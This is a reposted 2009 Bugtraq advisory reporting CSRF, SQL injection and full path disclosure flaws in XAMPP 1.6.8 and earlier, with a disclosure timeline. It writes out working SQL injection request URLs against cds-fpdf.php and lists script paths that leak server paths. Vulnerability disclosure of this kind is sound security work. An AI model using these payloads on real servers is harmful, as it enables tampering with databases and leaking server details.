天天看点
返回

Multiple vulnerabilities in XAMPP

<a href="http://www.securityfocus.com/bid/37999/exploit">http://www.securityfocus.com/bid/37999/exploit</a>

Hello Bugtraq!

I am continue informing you about multiple vulnerabilities in XAMPP.

-----------------------------

Advisory #7

CSRF, SQL Injection and Full path disclosure vulnerabilities in XAMPP

URL: http://websecurity.com.ua/3285/

Timeline:

27.06.2009 - found the vulnerabilities.

01.07.2009 - announced at my site.

02.07.2009 - informed developers.

08.08.2009 - disclosed at my site.

Details:

These are Cross-Site Request Forgery, SQL Injection and Full path disclosure

vulnerabilities.

CSRF:

http://site/xampp/cds-fpdf.php

It's possible to delete or add data in test table (as via CSRF, and as via

Insufficient Authorization vulnerabilities). And also to conduct SQL

Injection via CSRF attacks.

SQL Injection:

http://site/xampp/cds-fpdf.php?action=del&amp;id=-1%20or%201=1 (register globals

on)

http://site/xampp/cds-fpdf.php?interpret=1&amp;titel=1&amp;jahr=1),(version(),1,

1

http://site/xampp/cds-fpdf.php?interpret=1&amp;titel=',1,1),(version(),1,1)/

*

(mq off)

http://site/xampp/cds-fpdf.php?titel=1&amp;interpret=',1),(version(),1,1)/* (mq

off)

Attack is possible during access to admin panel (via Insufficient

Authorization), or via CSRF.

Full path disclosure:

http://site/xampp/external/ps/draw.php

http://site/xampp/external/ps/hyperlinks.php

http://site/xampp/external/ps/image.php

http://site/xampp/external/ps/overprint.php

http://site/xampp/external/ps/ps.php?submit=OK

http://site/xampp/external/ps/shading.php

http://site/xampp/external/ps/spotcolor.php

http://site/xampp/external/ps/text.php

http://site/xampp/special/ps/draw.php

http://site/xampp/special/ps/hyperlinks.php

http://site/xampp/special/ps/image.php

http://site/xampp/special/ps/overprint.php

http://site/xampp/special/ps/ps.php?submit=OK

http://site/xampp/special/ps/shading.php

http://site/xampp/special/ps/spotcolor.php

http://site/xampp/special/ps/text.php

Vulnerable are XAMPP 1.6.8 and previous versions. And potentially next

versions (including last version XAMPP 1.7.1).

Best wishes &amp; regards,

MustLive

Administrator of Websecurity web site

http://websecurity.com.ua

sql php xampp访问命令行 xampp外网访问 xampp访问 xampp命令行 xampp外网访问设置
上一篇: B-POJ-3278 Catch That Cow
下一篇: Samba setuid 'mount.cifs' Verbose Option Information Disclosure Vulnerability

继续阅读